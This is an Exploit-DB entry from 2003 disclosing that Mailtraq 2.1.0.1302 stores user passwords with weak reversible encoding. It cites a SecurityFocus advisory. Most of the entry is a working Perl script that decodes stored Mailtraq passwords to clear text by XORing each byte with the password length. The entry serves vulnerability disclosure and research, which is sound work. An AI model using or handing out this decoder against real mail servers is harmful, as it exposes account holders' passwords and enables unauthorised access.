Mailtraq 2.1.0.1302 - User Password Encoding Weakness

2003-06-16T00:00:00
ID EDB-ID:22779
Type exploitdb
Reporter Noam Rathaus
Modified 2003-06-16T00:00:00

Description

Mailtraq 2.1 .0.1302 User Password Encoding Weakness. Local exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/7923/info

It has been reported that Mailtraq does not securely store passwords. Because of this, an attacker may have an increased chance at gaining access to clear text passwords. 

#!/usr/bin/perl 

$Password = $ARGV[0]; 

print "Passwords should be something like: \\3D66656463626160\n"; 
print "Provided password: $Password\n"; 

$Password = substr($Password, 3); 
$Length = length($Password)/2; 

print "Length: $Length\n"; 

for ($i = 0; $i < $Length; $i++) 
{ 
 print "Decoding: ", substr($Password, $i*2, 2), " = "; 
 $ord = hex(substr($Password, $i*2, 2)); 

 print $ord^$Length, " (", chr($ord^$Length), ")\n"; 
}